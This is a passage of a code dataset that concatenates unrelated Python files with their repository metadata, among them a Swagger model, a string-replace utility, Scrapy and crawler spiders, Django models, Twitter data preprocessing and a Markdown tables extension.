:param max_simultaneous_uploads: The max_simultaneous_uploads of this FtsGeneralSettings. # noqa: E501
:type: int
"""
self._max_simultaneous_uploads = max_simultaneous_uploads
@property
def max_simultaneous_downloads(self):
"""Gets the max_simultaneous_downloads of this FtsGeneralSettings. # noqa: E501
Maximum simultaneos downloads # noqa: E501
:return: The max_simultaneous_downloads of this FtsGeneralSettings. # noqa: E501
:rtype: int
"""
return self._max_simultaneous_downloads
@max_simultaneous_downloads.setter
def max_simultaneous_downloads(self, max_simultaneous_downloads):
"""Sets the max_simultaneous_downloads of this FtsGeneralSettings.
Maximum simultaneos downloads # noqa: E501
:param max_simultaneous_downloads: The max_simultaneous_downloads of this FtsGeneralSettings. # noqa: E501
:type: int
"""
self._max_simultaneous_downloads = max_simultaneous_downloads
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(FtsGeneralSettings, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FtsGeneralSettings):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"dcompane@gmail.com"
] | dcompane@gmail.com |
810c2dd3f612f4af4deec9ef8adb78db3abf0469 | 8a1b90728c61ba5cf3e9c601d3c53e70722cf82f | /replace.py | 633bfd4cd648ad4478401a3891b5df81a19d2b90 | [] | no_license | luizcarlos16/sre_deal | 17f8f761a3fc922cf811bc59d5504971d4b6bfd4 | 193ea32e591e3e2ca8348543e855403a015a3d18 | refs/heads/main | 2023-03-12T16:16:00.137391 | 2021-03-02T05:12:10 | 2021-03-02T05:12:10 | 342,433,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | import os
def walk(path):
f = []
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
f.append(os.path.join(root, name))
return f
def check_if_string_in_file(file_name, string_to_search, string_to_replace):
if string_to_search in open(file_name, 'r',encoding='latin-1').read():
# print(file_name)
newText = open(file_name, 'r',encoding='latin-1').read().replace(string_to_search, string_to_replace)
# print(newText)
with open(file_name, 'w',encoding='latin-1') as f:
f.write(newText)
print('Qual diretorio quer analisar?')
caminho = input()
print('Qual string quer procurar?')
old = input()
print('Qual string quer adicionar?')
new = input()
for p in walk(caminho):
check_if_string_in_file(p, old, new) | [
"thecalifornia16@hotmail.com"
] | thecalifornia16@hotmail.com |
08824881bc68f2ddf1fee1b25916cd115d4df279 | aec59723a3dd0d3356a4ce426dc0fc381a4d3157 | /catalog/model/pricing.py | 020f6e8a724428673e0662dd1b10eba1af0e2087 | [] | no_license | Guya-LTD/catalog | f44e31593637e22b3b2a2869a387e29875986f7c | 632b3c3766e2600275c0a18db6378b2d38e3c463 | refs/heads/master | 2023-02-11T19:03:36.796812 | 2021-01-08T14:12:06 | 2021-01-08T14:12:06 | 275,332,646 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 859 | py | # -*- coding: utf-8 -*-
"""Copyright Header Details
Copyright
---------
Copyright (C) Guya , PLC - All Rights Reserved (As Of Pending...)
Unauthorized copying of this file, via any medium is strictly prohibited
Proprietary and confidential
LICENSE
-------
This file is subject to the terms and conditions defined in
file 'LICENSE.txt', which is part of this source code package.
Authors
-------
* [Simon Belete](https://github.com/Simonbelete)
Project
-------
* Name:
- Guya E-commerce & Guya Express
* Sub Project Name:
- Catalog Service
* Description
- Catlog Catalog Service
"""
"""Package details
Application features:
--------------------
Python 3.7
Flask
PEP-8 for code style
Entity.
"""
class Pricing:
"""A Base Model Representation of Pricing Entity."""
pass | [
"simonbelete@gmail.com"
] | simonbelete@gmail.com |
eee3cfdc459dc13a31ef3210abdd3ab4cc2b38fb | c16ea32a4cddb6b63ad3bacce3c6db0259d2bacd | /google/ads/googleads/v4/googleads-py/google/ads/googleads/v4/enums/types/product_bidding_category_level.py | 136f73cb4b5a918c667515478fd95aaa94f7a0f1 | [
"Apache-2.0"
] | permissive | dizcology/googleapis-gen | 74a72b655fba2565233e5a289cfaea6dc7b91e1a | 478f36572d7bcf1dc66038d0e76b9b3fa2abae63 | refs/heads/master | 2023-06-04T15:51:18.380826 | 2021-06-16T20:42:38 | 2021-06-16T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,232 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v4.enums',
marshal='google.ads.googleads.v4',
manifest={
'ProductBiddingCategoryLevelEnum',
},
)
class ProductBiddingCategoryLevelEnum(proto.Message):
r"""Level of a product bidding category. """
class ProductBiddingCategoryLevel(proto.Enum):
r"""Enum describing the level of the product bidding category."""
UNSPECIFIED = 0
UNKNOWN = 1
LEVEL1 = 2
LEVEL2 = 3
LEVEL3 = 4
LEVEL4 = 5
LEVEL5 = 6
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
3ad00265c8520a5d29f72a16e2d257962012b632 | 90ed257f4e193b0b19e5bcb9d4a384b0cf6e6d3f | /MUSEUMS/spiders/museum11.py | cc2aee513771a0bf7f5ac00b5c0cdbfde5f1198b | [] | no_license | BUCT-CS1701-SE-Design/webDataCollectionSystem | adc8ca97dda48c508909e73c02bb6622b93534b8 | f653b973b265d52e2ba4711b689c2de637a2cf8b | refs/heads/master | 2022-08-22T14:16:54.857847 | 2020-05-17T07:33:38 | 2020-05-17T07:33:38 | 256,792,222 | 1 | 1 | null | 2020-05-17T01:27:22 | 2020-04-18T15:49:35 | Python | UTF-8 | Python | false | false | 2,110 | py | # -*- coding: utf-8 -*-
import scrapy
from MUSEUMS.items import MuseumsItem #包含这个item类,必须设置
class Musume1Spider(scrapy.Spider):
name = 'museum11'
allowed_domains = ['www.chnmuseum.cn']
start_urls = ['http://www.chnmuseum.cn/']
# 设置经过哪个pipeline去处理,必须设置
custom_settings={
'ITEM_PIPELINES':{'MUSEUMS.pipelines.MuseumsPipeline': 1,}
}
def parse(self, response):
item=MuseumsItem()
item["museumID"]=11
item["museumName"]='中国国家博物馆'
item["Location"]='中国北京东城区东长安街16号'
item["Link"]='http://www.chnmuseum.cn/'
item["opentime"]="开馆时间09:00 停止入馆16:30 观众退场16:30 17:00闭馆时间"
item["telephone"]="参观咨询热线:010-65116400(9:00-16:00)"
item["introduction"]="""中国国家博物馆是代表国家收藏、研究、展示、阐释能够充分反映中华优秀传统文化、革命文化和社会主义先进文化代表性物证的最高机构,是国家最高历史文化艺术殿堂和文化客厅。2012年11月29日,习近平总书记率领十八届中央政治局常委来到中国国家博物馆参观“复兴之路”基本陈列,发出实现中华民族伟大复兴中国梦的伟大号召,中国特色社会主义新时代在这里扬帆启程。2018年11月13日,习近平总书记等中央领导同志来到中国国家博物馆参观“伟大的变革——庆祝改革开放40周年大型展览”,要求通过展览教育引导广大干部群众更加深刻地认识到中国共产党、中国人民和中国特色社会主义的伟大力量,更加深刻地认识到我们党的理论是正确的、党中央确定的改革开放路线方针是正确的、改革开放的一系列战略部署是正确的,更加深刻地认识到改革开放和社会主义现代化建设的光明前景,统一思想、凝聚共识、鼓舞斗志、团结奋斗,坚定跟党走中国特色社会主义道路、改革开放道路的信心和决心。"""
yield item
| [
"455693279@qq.com"
] | 455693279@qq.com |
1d5bd5c1dba8192aba45f511c1b8bd9d5e1711f2 | c127fda2d2961ef2ce4480527769dc595e988b97 | /spider.py | e5102d3bddde7603acdf4bb71cae74b74b85be20 | [] | no_license | naman1901/9gag-Image-Downloader | 96e94d7ec2c02a6519341b935b4fd8e029641d96 | 19380a997a6a8fa229f36344c79ab29f90c9485f | refs/heads/master | 2021-01-10T06:56:11.703854 | 2016-04-08T17:53:55 | 2016-04-08T17:53:55 | 55,598,405 | 1 | 1 | null | 2018-10-27T16:59:33 | 2016-04-06T10:55:42 | Python | UTF-8 | Python | false | false | 1,948 | py | from urllib.request import urlopen
from linkFinder import LinkFinder
from functions import *
class Spider:
# Class variables shared among all instances
projectName = ''
baseURL = ''
domainName = ''
queueFile = ''
crawledFile = ''
queue = set()
crawled = set()
def __init__(self, projectName, baseURL, domainName):
Spider.projectName = projectName
Spider.baseURL = baseURL
Spider.domainName = domainName
Spider.queueFile = Spider.projectName + '/queue.txt'
Spider.crawledFile = Spider.projectName + '/crawled.txt'
self.boot()
self.crawlPage('First Spider', Spider.baseURL)
@staticmethod
def boot():
createProjectDir(Spider.projectName)
createDataFiles(Spider.projectName, Spider.baseURL)
Spider.queue = fileToSet(Spider.queueFile)
Spider.crawled = fileToSet(Spider.crawledFile)
@staticmethod
def crawlPage(threadName, pageURL):
if pageURL not in Spider.crawled:
print(threadName + ' at page ' + pageURL)
print('Pages in Queue: ' + str(len(Spider.queue)) + " | Crawled Pages: " + str(len(Spider.crawled)))
Spider.addLinksToQueue(Spider.gatherLinks(pageURL))
if pageURL in Spider.queue:
Spider.queue.remove(pageURL)
Spider.crawled.add(pageURL)
Spider.updateFiles()
@staticmethod
def gatherLinks(pageURL):
htmlString = ''
try:
response = urlopen(pageURL)
if 'text/html' in response.getheader('Content-Type'):
htmlBytes = response.read()
htmlString = htmlBytes.decode("utf-8")
finder = LinkFinder(Spider.baseURL, pageURL)
finder.feed(htmlString)
except:
print("Error: Cannot crawl the page at " + pageURL)
return set()
return finder.returnLinks()
@staticmethod
def addLinksToQueue(links):
for link in links:
if Spider.domainName not in link:
continue
if link not in Spider.crawled:
Spider.queue.add(link)
@staticmethod
def updateFiles():
setToFile(Spider.queue, Spider.queueFile)
setToFile(Spider.crawled, Spider.crawledFile) | [
"naman1901@gmail.com"
] | naman1901@gmail.com |
3eb6943aae1ad11db104ee00d54ed9bccbb642e4 | 855dc9fcd4170923e8723b6946c09c5cae68e079 | /what_transcode/migrations/0001_initial.py | cb61199f9d66f0b1aee0d9c062f1096d498bbdcf | [
"MIT"
] | permissive | point-source/WhatManager2 | 3fc72976402ac40d132aef0deffd8bcfbd209703 | ddbce0fa1ff4e1fc44bfa726c4f7eace4adbe8a9 | refs/heads/master | 2023-01-27T11:39:43.861041 | 2019-02-24T17:51:24 | 2019-02-24T17:51:24 | 210,232,561 | 1 | 0 | MIT | 2019-09-23T00:21:54 | 2019-09-23T00:21:53 | null | UTF-8 | Python | false | false | 985 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='TranscodeRequest',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False,
auto_created=True, primary_key=True)),
('requested_by_ip', models.TextField()),
('requested_by_what_user', models.TextField()),
('date_requested', models.DateTimeField(auto_now_add=True)),
('date_completed', models.DateTimeField(null=True)),
('celery_task_id', models.TextField(null=True)),
('what_torrent', models.ForeignKey(to='home.WhatTorrent')),
],
options={
},
bases=(models.Model,),
),
]
| [
"ivailo@karamanolev.com"
] | ivailo@karamanolev.com |
f3822c56be1305e7b55915ab88f6b4e8ff7f9704 | 62587160029c7c79b5d11f16e8beae4afa1c4834 | /webpages/island_scraper_kyero/island_scraper/middlewares.py | f34dd9c19c21b5524d2483086acae265764a8f49 | [] | no_license | LukaszMalucha/Scrapy-Collection | b11dcf2c09f33d190e506559d978e4f3b77f9f5a | 586f23b90aa984c22ea8f84eba664db9649ed780 | refs/heads/master | 2022-12-14T15:06:00.868322 | 2021-07-27T12:09:07 | 2021-07-27T12:09:07 | 144,448,351 | 3 | 0 | null | 2022-11-22T03:16:19 | 2018-08-12T07:55:05 | Python | UTF-8 | Python | false | false | 3,611 | py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class IslandScraperSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class IslandScraperDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| [
"lucasmalucha@gmail.com"
] | lucasmalucha@gmail.com |
14f648102f5ede6ed0cbfd6da4036fb02e0e97b3 | 8983b099a27d124b17fc20d4e9b5ec2f0bf8be25 | /altair/schema/_interface/named_channels.py | d2d7c77e95eadb00163c13a153019fb543b03f86 | [
"BSD-3-Clause"
] | permissive | princessd8251/altair | a7afa0745291f82215fbda6a477e369f59fcf294 | 387c575ee0410e7ac804273a0f2e5574f4cca26f | refs/heads/master | 2021-01-16T21:41:40.935679 | 2017-08-10T16:36:05 | 2017-08-10T16:36:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | # -*- coding: utf-8 -*-
# Auto-generated file: do not modify directly
# - altair version info: v1.2.0-98-g8a98636
# - date: 2017-08-09 12:14:26
from . import channel_wrappers
class Color(channel_wrappers.ChannelWithLegend):
pass
class Column(channel_wrappers.PositionChannel):
pass
class Detail(channel_wrappers.Field):
pass
class Label(channel_wrappers.Field):
pass
class Opacity(channel_wrappers.ChannelWithLegend):
pass
class Order(channel_wrappers.OrderChannel):
pass
class Path(channel_wrappers.OrderChannel):
pass
class Row(channel_wrappers.PositionChannel):
pass
class Shape(channel_wrappers.ChannelWithLegend):
pass
class Size(channel_wrappers.ChannelWithLegend):
pass
class Text(channel_wrappers.Field):
pass
class X(channel_wrappers.PositionChannel):
pass
class X2(channel_wrappers.Field):
pass
class Y(channel_wrappers.PositionChannel):
pass
class Y2(channel_wrappers.Field):
pass
| [
"jakevdp@gmail.com"
] | jakevdp@gmail.com |
afc8b7c0f07cc20743f9cd2b06061d58dd632a32 | bf30943529db58f9ea65aa38fbc8b3abc0a29d53 | /app/products/models.py | 405f1fb4222f7a74289e4c8bb9525665aa9fff7b | [
"MIT"
] | permissive | kummitha503/django-tip-01 | bc9d19233a18959162f716c9897995079a3163a4 | 5eb8e3b7ce0741c5be4b78afefa6e4862f664d16 | refs/heads/master | 2020-11-29T01:27:04.549386 | 2017-08-14T12:23:59 | 2017-08-14T12:23:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | from django.db import models
class Product(models.Model):
title = models.CharField(max_length=100, blank=True)
is_active = models.BooleanField(default=True)
is_adult = models.BooleanField(default=False)
def __str__(self):
return "{}".format(self.id)
| [
"lucas.magnum@fyndiq.com"
] | lucas.magnum@fyndiq.com |
5e9cf5ae03e925ad4d818c9b0637c412bbc60146 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02709/s022509829.py | dd9fa602873f6ee74e43f9bacf44dd9a2eee3894 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | import sys
input = sys.stdin.readline
from collections import deque
N = int(input())
#A = list(map(int, input().split()))
A = [(a, i) for i, a in enumerate(map(int, input().split()))]
A = sorted(A, reverse=True)
values = []
num_indcies = {}
for i, a in enumerate(A):
if not a in num_indcies:
num_indcies[a] = [i]
values.append(a)
else:
num_indcies[a].append(i)
values = sorted(values, reverse=True)
ans = 0
# indexの配列
dp_indices = []
for v in values:
dp_indices.extend(num_indcies[v])
dp = [[0] * (N+1) for _ in range(N+1)]
for no, (a, pos) in enumerate(A):
for i in range(no+1):
j = no - i
#k = dp_indices[i+j-2]
#a = A[k]
dp[i+1][j] = max(dp[i+1][j], dp[i][j] + a * (pos -i))
dp[i][j+1] = max(dp[i][j+1], dp[i][j] + a * abs(pos - (N-1-j)))
ans = 0
for i in range(1, N+1):
ans = max(ans, dp[i][N-i])
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
48b1cfe1f2c159159035fd8b8781a2df3fb2ffde | b11a5afd6682fe003445431ab60a9273a8680c23 | /language/nqg/tasks/spider/write_dataset.py | b2ed9f1018cf872e2b4933c9712c698deaeb8e52 | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | Srividya-me/language | a874b11783e94da7747fc9a1b0ae1661cd5c9d4a | 61fa7260ac7d690d11ef72ca863e45a37c0bdc80 | refs/heads/master | 2023-08-28T10:30:59.688879 | 2021-11-12T22:31:56 | 2021-11-13T01:04:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,111 | py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Write Spider dataset in TSV format."""
import json
from absl import app
from absl import flags
from language.nqg.tasks import tsv_utils
from language.nqg.tasks.spider import database_constants
from tensorflow.io import gfile
FLAGS = flags.FLAGS
flags.DEFINE_string("examples", "", "Path to Spider json examples.")
flags.DEFINE_string("output", "", "Output tsv file.")
flags.DEFINE_bool(
"filter_by_database", True,
"Whether to only select examples for databases used for the Spider-SSP"
"setting proposed in the paper. Should be False to follow the standard"
"Spider-XSP setting.")
def normalize_whitespace(source):
tokens = source.split()
return " ".join(tokens)
def load_json(filepath):
with gfile.GFile(filepath, "r") as reader:
text = reader.read()
return json.loads(text)
def main(unused_argv):
examples_json = load_json(FLAGS.examples)
examples = []
for example_json in examples_json:
database = example_json["db_id"]
source = example_json["question"]
target = example_json["query"]
# Optionally skip if database not in set of databases with >= 50 examples.
if (FLAGS.filter_by_database and
database not in database_constants.DATABASES):
continue
# Prepend database.
source = "%s: %s" % (database, source)
target = normalize_whitespace(target)
examples.append((source.lower(), target.lower()))
tsv_utils.write_tsv(examples, FLAGS.output)
if __name__ == "__main__":
app.run(main)
| [
"kentonl@google.com"
] | kentonl@google.com |
6d4669427a2a68d23356eca9f2b95764ad636720 | 4c255e0f3411171b0fdd797a96154245df7a55c7 | /coordination_network_toolkit/preprocess.py | 2155e5d7d97d6f8ef3a605afa55dc602a601048c | [
"MIT"
] | permissive | weiaiwayne/coordination-network-toolkit | db589605b7166caf476cb4c941988fefbf9ec8cb | f8d654ad3f1fdd21204a0aabf61e25f254da3b92 | refs/heads/main | 2023-02-18T05:28:45.384987 | 2021-01-19T00:50:46 | 2021-01-19T00:50:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,843 | py | import json
import zlib
import csv
from coordination_network_toolkit.database import initialise_db
from typing import Iterable, List
def preprocess_csv_files(db_path: str, input_filenames: List[str]):
for message_file in input_filenames:
# Skip the header
print(f"Begin preprocessing {message_file} into {db_path}")
with open(message_file, "r") as messages:
reader = csv.reader(messages)
# Skip header
next(reader)
preprocess_data(db_path, reader)
print(f"Done preprocessing {message_file} into {db_path}")
def preprocess_data(db_path: str, messages: Iterable):
"""
Add messages to the dataset from the specified CSV files..
Messages should be an iterator of messages with the content for each message
in the following order:
- message_id: the unique identifier of the message on the platform
- user_id: the unique identifier of the user on the platform
- username: the text of the username (only used for display)
- repost_id: if the message is a verbatim report of another message (such as a retweet
or reblog), this is the identifier of that other message. Empty strings will be
converted to null
- reply_id: if the message is in reply to another message, the identifier for that other
message. Empty strings will be converted to null.
- message: the text of the message.
- timestamp: A timestamp in seconds for the message. The absolute offset does not matter,
but it needs to be consistent across all rows
- urls: A space delimited string containing all of the URLs in the message
"""
db = initialise_db(db_path)
try:
db.execute("begin")
processed = (
(
message_id,
user_id,
username,
repost_id or None,
reply_id or None,
message,
len(message),
zlib.adler32(message.encode("utf8")),
# This will be populated only when similarity calculations are necessary
None,
float(timestamp),
urls.split(" ") if urls else [],
)
for message_id, user_id, username, repost_id, reply_id, message, timestamp, urls in messages
)
for row in processed:
db.execute(
"insert or ignore into edge values (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
row[:-1],
)
message_id, user_id = row[:2]
timestamp = row[-2]
# Ignore url shared in reposts
if not row[3]:
for url in row[-1]:
db.execute(
"insert or ignore into message_url values(?, ?, ?, ?)",
(message_id, url, timestamp, user_id),
)
db.execute("commit")
finally:
db.close()
def preprocess_twitter_json_files(db_path: str, input_filenames: List[str]):
for message_file in input_filenames:
# Skip the header
print(f"Begin preprocessing {message_file} into {db_path}")
with open(message_file, "r") as tweets:
preprocess_twitter_json_data(db_path, tweets)
print(f"Done preprocessing {message_file} into {db_path}")
def preprocess_twitter_json_data(db_path: str, tweets: Iterable[str]):
"""
Add messages to the dataset from the specified tweets in Twitter JSON format.
Tweets must be in Twitter JSON format as collected from the v1.1 JSON API.
"""
db = initialise_db(db_path)
try:
db.execute("begin")
for raw_tweet in tweets:
tweet = json.loads(raw_tweet)
# Try grabbing the full_text field from the extended format, otherwise
# check if there's a extended_tweet object.
# print(sorted(tweet.keys()))
if "full_text" in tweet:
tweet_text = tweet["full_text"]
elif "extended_tweet" in tweet:
tweet_text = tweet["extended_tweet"]["full_text"]
else:
tweet_text = tweet["text"]
retweet = tweet.get("retweeted_status", {})
row = (
tweet["id_str"],
tweet["user"]["id_str"],
tweet["user"]["screen_name"],
retweet.get("id_str"),
tweet.get("in_reply_to_status_id_str", None),
tweet_text,
len(tweet_text),
zlib.adler32(tweet_text.encode("utf8")),
# This will be populated only when similarity calculations are necessary
None,
# Twitter epoch in seconds
(int(tweet["id"]) >> 22) / 1000,
)
db.execute(
"insert or ignore into edge values (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", row,
)
# If it's a retweet, don't consider any of the urls as candidates
if not row[3]:
if retweet:
url_entities = retweet.get("extended_tweet", retweet)["entities"][
"urls"
]
else:
url_entities = tweet.get("extended_tweet", tweet)["entities"]["urls"]
message_id, user_id = row[:2]
timestamp = row[-1]
urls = [u["expanded_url"] for u in url_entities]
# Ignore urls shared in reposts
for url in urls:
db.execute(
"insert or ignore into message_url values(?, ?, ?, ?)",
(message_id, url, timestamp, user_id),
)
db.execute("commit")
finally:
db.close()
| [
"elizabeth.alpert@qut.edu.au"
] | elizabeth.alpert@qut.edu.au |
a656ad4c91c3d12a31134e288572b4f8972bd4e1 | a5819a63baf9536facf7edebf3e3934b7d8286c1 | /egrep.py | efd1360cd7e2ab240765e05c33b60855aae68d2c | [] | no_license | nasreenkhan/data-science-from-scratch | 86d278c3d0f09b96a704a6c54fa05b87197d6b21 | 5a832dd8f9b423f22d1e7161ddeaaa3af123c696 | refs/heads/master | 2022-06-22T21:48:18.110425 | 2020-05-13T02:27:33 | 2020-05-13T02:27:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 212 | py | import sys, re
regex = sys.argv[1]
# For every line passed into the script
for line in sys.stdin:
# If it matches the regex, write it to stdout
if re.search(regex, line):
sys.stdout.write(line)
| [
"santi.viquez@gmail.com"
] | santi.viquez@gmail.com |
6836d5503f43a90573faaab4769192dd27d75f0c | 0ed73ce8e9bed3ef3bd376714cb99d450bde78da | /todotask/urls.py | 7a924d22fc7bebac301493e0263cf1c2c56d459e | [] | no_license | Mikolo007/LIPE-To-do | 8402f71ee90a6ee6c6cd859b600615979a084610 | c45adc56aa960fb239ae5c497d011a31e994fe7d | refs/heads/master | 2022-09-17T13:27:36.354321 | 2020-06-04T22:17:34 | 2020-06-04T22:17:34 | 268,232,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py |
from django.urls import path
from .views import index
urlpatterns = [
path('', index, name='todotask'),
]
| [
"mikeakalaa@gmail.com"
] | mikeakalaa@gmail.com |
edf0c98ce98b70722a869867df79d216a02dc1f8 | ef387a1be75136955a5460b9bcc4fd42048d7700 | /matrixGenerator.py | 0759f90881a9c9a4289d584271f472ff1b805e8a | [] | no_license | allenyu94/NPTSP | b3098648ec7e9f0f5123114e257b6ca184bea089 | a38d496eff79715081abc406585c806f290d06db | refs/heads/master | 2020-04-13T17:01:38.027214 | 2015-05-08T07:17:00 | 2015-05-08T07:17:00 | 34,770,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | import fileinput
first = True
matrix = None
for line in fileinput.input():
if first:
first = False
matrix = [[100]*int(line) for i in range(int(line))] #[[100]*int(line)]*int(line) # can change the default of the other lines you don't care about
for j in xrange(int(line)):
matrix[j][j] = 0
else:
line = line.split()
edge = line[0]
weight = line[1]
matrix[int(edge[1])-1][int(edge[3])-1] = weight
matrix[int(edge[3])-1][int(edge[1])-1] = weight
# print out
for row in matrix:
for elem in row:
print elem,
print('\n')
| [
"janetpchu@berkeley.edu"
] | janetpchu@berkeley.edu |
6544fcf260d6f8112c79a5e3a5ec70a10575a277 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/pg_1425+219/sdB_PG_1425+219_lc.py | e8ee83c9f091b54b888664988d5fb0c6cd57aee1 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[216.986042,21.632814], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_PG_1425+219 /sdB_PG_1425+219_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
e073a8419eda5bafad84588f1124d089f124d4cd | 5864e86954a221d52d4fa83a607c71bacf201c5a | /carbon/common/lib/markdown/extensions/tables.py | f613f9a67f1f99e646124dad4f9a5fdff380870a | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,302 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\lib\markdown\extensions\tables.py
import markdown
from markdown.util import etree
class TableProcessor(markdown.blockprocessors.BlockProcessor):
def test(self, parent, block):
rows = block.split('\n')
return len(rows) > 2 and '|' in rows[0] and '|' in rows[1] and '-' in rows[1] and rows[1].strip()[0] in ('|', ':', '-')
def run(self, parent, blocks):
block = blocks.pop(0).split('\n')
header = block[0].strip()
seperator = block[1].strip()
rows = block[2:]
border = False
if header.startswith('|'):
border = True
align = []
for c in self._split_row(seperator, border):
if c.startswith(':') and c.endswith(':'):
align.append('center')
elif c.startswith(':'):
align.append('left')
elif c.endswith(':'):
align.append('right')
else:
align.append(None)
